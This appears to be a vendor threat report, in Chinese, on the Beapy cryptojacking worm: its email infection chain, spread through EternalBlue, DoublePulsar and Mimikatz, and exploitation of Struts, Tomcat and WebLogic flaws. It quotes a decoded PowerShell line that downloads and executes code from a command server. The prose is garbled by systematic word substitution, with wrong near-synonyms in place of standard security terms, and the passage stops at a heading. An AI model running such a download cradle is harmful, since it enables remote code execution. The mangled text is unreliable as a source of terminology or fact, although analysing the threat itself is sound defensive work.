北京 - 2019年4月29日 - 2019 年 1 月,赛门铁克安适中心初度监测到Beapy,一种新型的加密劫持措施,它可以操作 EternalBlue 缝隙以及窃取的硬编码根据,在网络中快速流传并对企业进行打击。如今,我们在Web处事器上也检测到了Beapy勾当,并且自3月份以来Beapy的打击范畴还在不停增加。
Beapy (W32.Beapy) 是一种基于文件的货币挖矿措施,其最初传染源为电子邮件。虽然自 2018 年初以来,加密劫持的数量已经有所减少,但Beapy的呈现说明,加密劫持仍然是某些网络犯法分子的首选手段,而企业成为了他们的首要打击方针。
以打击方针来看,Beapy的打击东西几乎全部是企业(见图 1)。这一打击趋势与2018 年 的Bluwimps 蠕虫 (MSH.Bluwimps) 十分相似,这暗示加密劫持网络犯法分子对企业的存眷度更高,这一发此刻赛门铁克 2019 年《互联网安适威胁呈报》 中也有提到。虽然没有证据表白这些网络打击勾当的针对性,但Beapy蠕虫病毒的特性表白,它很可能被设计为主要依靠企业网络来进行流传。
图 1. 企业与消费者Beapy传染率比拟
这与2018 年勒索软件的趋势十分类似——尽管从总体来看,2018年勒索软件传染率下降了 20%,但企业的传染率却依旧增加了 12%,由此可见,网络犯法分子对企业的存眷度还在连续增加。
Beapy恶意措施对亚洲企业的影响最为严重,此中赶过 80%的受害者及受害企业来自中国,其余的20%则漫衍于韩国、日本和越南等其他国家和地区。
图 2.各地区 Beapy 传染率
传染链Beapy 勾当的最初传染源是电子邮件。如果收件人打开了带有恶意Excel文档的附件,方针计算机就会主动下载DoublePulsar 后门(Backdoor.Doublepulsar)。同 EternalBlue 一样,DoublePulsar 也会在 Shadow Brokers 转储中进行泄露,这一行为也曾被用于 2017 年WannaCry 勒索软件粉碎性打击。DoublePulsar 会在受传染的计算机上开启后门措施并允许长途代码执行操纵。EternalBlue 则操作 Windows SMB协议中的缝隙允许文件在网络中横向流传。
DoublePulsar 安置告成后,会执行一个 PowerShell 命令,并在与Beapy命令和控制处事器通信后将货币挖矿措施下载到方针计算机。2019 年 2 月 15日,赛门铁克安适中心第一次监测到了DoublePulsar 后门措施,随后 PowerShell 命令被启动,该命令被解码为以下内容:
IEX (New-Object Net.WebClient).downloadstring(''+$env:USERDOMAIN)
这意味着设备正在与 Beapy 命令和控制处事器成立通信,计算机会继续执行其他的PowerShell 命令,同时下载货币挖矿措施。在 Beapy 流传到网络中其他计算机上时,会反复此过程。
一般而言,Beapy 会将未安置补丁的机器作为打击东西,然后借助EternalBlue进行流传。但是,EternalBlue 并不是 Beapy的独一流传工具,它还可以使用根据偷窃工具 Hacktool.Mimikatz 从受传染的计算机上收集凭证。通过这些流传工具,Beapy甚至还可以流传到安置了补丁措施的机器上。与Bluwimps 蠕虫类似,Beapy 甚至还可以使用硬编码用户名和暗码列表测验考试跨网络流传。早在 2017 年和 2018 年,Bluwimps就曾使用货币挖矿措施传染了数千台企业机器。
赛门铁克安适中心还在面向公家的 Web 处事器上监测到了 Beapy 的早期版本,其时该措施试图流传到与处事器相连的计算机上,形式之一是它会自动生成一个打击方针的IP地点列表。
在Web 处事器上看到的是Beapy措施的早期版本,早期版本与后来的版本都是由 C 语言编写,而非 Python ,并且打击手段类似,其下载的恶意软件中也含有用于根据收集的 Mimikatz 模块,以及 EternalBlue的缝隙操作成果。
在Web 处事器打击中,Beapy 曾试图操作 Apache Struts 缝隙 (CVE-2017-5638) ——这一缝隙在 2017 年进行了修补,但如果它被告成攻破并操作,便会允许长途代码执行操纵。Beapy 还测验考试操作了 Apache Tomcat (CVE-2017-12615) 和 Oracle WebLogic Server (CVE-2017-10271) 中的已知缝隙。在赛门铁克不雅察看到的Web 处事器打击中,这种缝隙操作测验考试行为开始于 2 月初,初度检测到与Beapy命令和控制处事器的通信是在 3 月 13 日,针对此 Web 处事器的 Beapy 勾当则一直连续到 4 月初。
总体来说, Beapy 的勾当从3月初开始便一直在增加。
图 3.Beapy勾当明显激增
Beapy 勾当表白了什么?